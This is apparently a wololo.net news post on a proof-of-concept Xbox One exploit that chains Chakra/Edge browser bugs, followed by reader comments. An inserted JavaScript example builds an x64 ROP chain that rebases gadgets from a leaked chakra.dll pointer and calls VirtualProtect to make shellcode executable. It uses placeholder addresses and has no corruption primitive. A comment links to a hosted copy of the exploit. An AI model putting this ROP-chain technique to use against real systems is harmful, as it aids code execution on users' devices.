Xbox One hack: Xbox One Exploit Proof of Concept released, based on Chakra exploit (unconfirmed)
Developer unknownv2 has released a proof of concept exploit for the Xbox One. The exploit leverages two known vulnerabilities in the Chakra JavaScript engine of the Microsoft Edge browser (CVE-2016-7200 and CVE-2016-7241). We have not confirmed that this exploit works here at wololo.net (yup, I still don’t have an Xbox One…).
The Xbox One uses Microsoft’s Edge browser. Pretty much the same browser that you used once on Windows 10, to download Google Chrome.
In November last year, Microsoft patched several critical vulnerabilities in the Edge browser and disclosed them at the same time. Developer Brian Pak released a proof of concept for these vulnerabilities, demonstrating how to chain them into a working exploit. This is known as the Chakra exploit, and a good read on the topic can be found here.
Hacker unknownv2 has built his Xbox One exploit on top of Brian Pak’s proof of concept. In the developer’s words:
The POC itself was mostly complete, but the first bug (CVE-2016-7200) it used was patched on the console. I used the JSON.parse bug (CVE-2016-7241) to leak addresses instead and, after a bit of tweaking with the values, I was able to get the correct address for chakra.dll. From there, I modified the POC by changing the code addresses for the gadgets and the VirtualProtect function call to make the shellcode executable.
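The porting step unknownv2 describes above is mostly bookkeeping: one leaked chakra.dll pointer gives the module base, every gadget is rebased to it, and the chain ends in a VirtualProtect call that flips the shellcode's page to RWX. The following is an added example illustrating that step; it is not unknownv2's or Brian Pak's code. Every RVA in the table, the leaked value, the shellcode address and the VirtualProtect address are hypothetical placeholders, and the VirtualProtect address is assumed already resolved (a real chain would typically read it out of chakra.dll's import table with the exploit's read primitive, which this example does not have). There is no memory-corruption primitive here, only the 64-bit arithmetic, a sanity check on the computed base, and the x64 calling-convention layout; it runs under Node.

```javascript
// Added example (not unknownv2's or Brian Pak's code). All RVAs and
// addresses below are HYPOTHETICAL placeholders; real offsets depend on
// the exact chakra.dll build on the console.

const PAGE_EXECUTE_READWRITE = 0x40;

// A JS double only holds 53 integer bits, so x64 addresses are kept as
// {hi, lo} unsigned 32-bit halves, as Chakra/Edge exploits commonly do.
function addr(hi, lo) {
  return { hi: hi >>> 0, lo: lo >>> 0 };   // >>> 0 reduces mod 2^32
}

// a + n for an unsigned 32-bit n (an RVA or a constant), carrying into hi.
function add64(a, n) {
  const sum = a.lo + n;                     // < 2^33, exact in a double
  return addr(a.hi + (sum >= 0x100000000 ? 1 : 0), sum);
}

// a - n for an unsigned 32-bit n, borrowing from hi.
function sub64(a, n) {
  return addr(a.hi - (a.lo < n ? 1 : 0), a.lo - n);
}

function hex64(a) {
  return '0x' + a.hi.toString(16).padStart(8, '0')
              + a.lo.toString(16).padStart(8, '0');
}

// Hypothetical RVAs, as if read off a disassembly of one chakra.dll build.
// Porting to another build (the "changing the code addresses" step in the
// quote) means editing only this table.
const RVA = {
  leakedFunc: 0x0001f2a0,   // function whose address the info leak returns
  popRcxRet:  0x00010a11,   // pop rcx ; ret
  popRdxRet:  0x00022b73,   // pop rdx ; ret
  popR8Ret:   0x00034c55,   // pop r8 ; ret
  popR9Ret:   0x00041d37,   // pop r9 ; ret
};

// Module base = leaked pointer - its RVA, with a plausibility check:
// Windows maps images at 64 KiB-aligned addresses, so anything else means
// the leak or the RVA table belongs to a different build. Failing here is
// cheaper than crashing the console on a chain built from wrong offsets.
function moduleBaseFromLeak(leaked, rvaOfLeaked) {
  const base = sub64(leaked, rvaOfLeaked);
  if ((base.lo & 0xffff) !== 0) {
    throw new Error('implausible module base ' + hex64(base) + ' (wrong RVA table?)');
  }
  return base;
}

// ROP chain for VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect).
// Windows x64 passes the first four integer args in rcx, rdx, r8, r9, and the
// callee owns 32 bytes of shadow space above its return address.
function buildRopChain(base, virtualProtect, shellcode, size, oldProtectSlot) {
  const gadget = (name) => add64(base, RVA[name]);
  return [
    gadget('popRcxRet'), shellcode,                        // rcx = lpAddress
    gadget('popRdxRet'), addr(0, size),                    // rdx = dwSize
    gadget('popR8Ret'),  addr(0, PAGE_EXECUTE_READWRITE),  // r8  = flNewProtect
    gadget('popR9Ret'),  oldProtectSlot,                   // r9  = writable qword for the old protection
    virtualProtect,                                        // ret into VirtualProtect
    shellcode,                                             // VirtualProtect's ret lands in the now-RWX shellcode
    addr(0, 0), addr(0, 0), addr(0, 0), addr(0, 0),        // shadow space the callee may clobber
  ];
}

// Serialise as little-endian qwords (lo dword first): the form in which the
// chain would be written into the hijacked stack frame.
function chainToUint32Array(chain) {
  const out = new Uint32Array(chain.length * 2);
  chain.forEach((q, i) => { out[2 * i] = q.lo; out[2 * i + 1] = q.hi; });
  return out;
}

// Constructed demo values (hypothetical).
const leaked     = addr(0x00007ff8, 0x1234f2a0);        // what the leak returned
const base       = moduleBaseFromLeak(leaked, RVA.leakedFunc);
const vpAddr     = addr(0x00007ff8, 0x7c6a1b20);        // VirtualProtect, assumed resolved separately
const shellcode  = addr(0x000001e9, 0x4a8c0000);        // buffer holding the payload
const chain      = buildRopChain(base, vpAddr, shellcode, 0x1000, add64(shellcode, 0xff8));
const chainBytes = chainToUint32Array(chain);

console.log('chakra.dll base:', hex64(base));           // 0x00007ff812330000
console.log('chain (qwords):', chain.map(hex64).join(' '));
```

The alignment check is the part worth keeping when adapting a PoC to a new build: a leak that subtracts to a non-64 KiB-aligned base is the earliest, cheapest signal that the offset table is for the wrong chakra.dll, well before the console crashes on a bad gadget.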
This is a userland exploit, similar to the WebKit exploits that many of us are familiar with. From unknownv2:
Currently the Xbox One has a sandboxed AppContainer protection just like Windows 10. Therefore, the Edge app and its code have restricted access to the file’s resources, and further work is needed to escalate the process’s privileges. This could be in the form of a kernel exploit.
The sandbox is similar to the PS4 in the sense that it is limited in what you can do, but it’s the same thing as getting RCE on Edge on Windows 10 essentially.
Unknownv2’s exploit works on Xbox One firmware 10.0.14393.2152 (released in December last year), according to the developer. Note that a new firmware update for the Xbox One was released earlier this week, and it is not clear whether that firmware patches the vulnerabilities involved here; if you want to try the exploit, hold off on updating until someone confirms.
I do not have an Xbox One and cannot verify that the exploit indeed works. With that being said, there are enough hints pointing to this being real, so if you have an Xbox running on the affected firmware, feel free to give it a try and comment.
Download Chakra exploit for Xbox
You can get the necessary files from the developer’s GitHub here. Please leave your feedback in the comments below!
Source: unknownv2
You know what? I’m HANDSOME!
You are very handsome
First w00t w00t
fail wOOt wOOt
Unknownv2 did some legit work back in the 360 days with game mods/tools. Inclined to believe this is legit
Why did the hacker make it public, for Microsoft to patch it? Better they make a CFW so Microsoft or Sony can’t patch it 😉
And how exactly would the release of a CFW prevent them from patching anything?
FYI, the vulnerability has been known since 2016-09-09, so the hacker didn’t publicize anything.
Looking forward to Smach Z pro, and the new next portable gaming console from Sony.
Also I love Playstation 2 games, they should remaster them in a new handheld console.
Keep useless comments about PlayStation out of here.
Okay here is a comment not about PlayStation:
Xbox One is so inferior Wololo doesn’t even care to own one.
In which way is the Xbox One inferior?
All consoles are inferior to the PC master race.
Or maybe, he just doesn’t *prefer* it… Huh, imagine that. Not inferior or superior, just preference? Impossible.
Commodore 64 FTW! Shove Xbox and PS4 up your bu.mhole
I’ve tested this and it does work, but without a sandbox or kernel exploit it’s not super useful. It is very useful if you are developing a sandbox or kernel exploit, though…
It works, try it yourself: raptordmg.000webhostapp.com
Has anyone tried on current FW? I don’t want to update.
And yeah, next step is a kexploit via sc. Go for it! 🙂
Patched on latest Alpha Preview build. Really sad. Could just need some modding, though. I have no idea.
I have my Xbone on the exact firmware and it says “exploit done” (https://cdn.discordapp.com/attachments/267022506622189570/298159104122159114/26004.jpg)
Yeah, here’s the problem now though. I also have an Xbox One on this firmware, but I tried the exploit today, and the Xbox One will not even connect to machines on the local network without updating the console. I don’t think there’s any way possible to use this exploit anymore. Please correct me if I’m wrong.
hacked facebook account please get it back
The master chief can smell this one.
I hope somebody could hack the kernel and we could get a fully working Windows 10 running on the Xbox One S.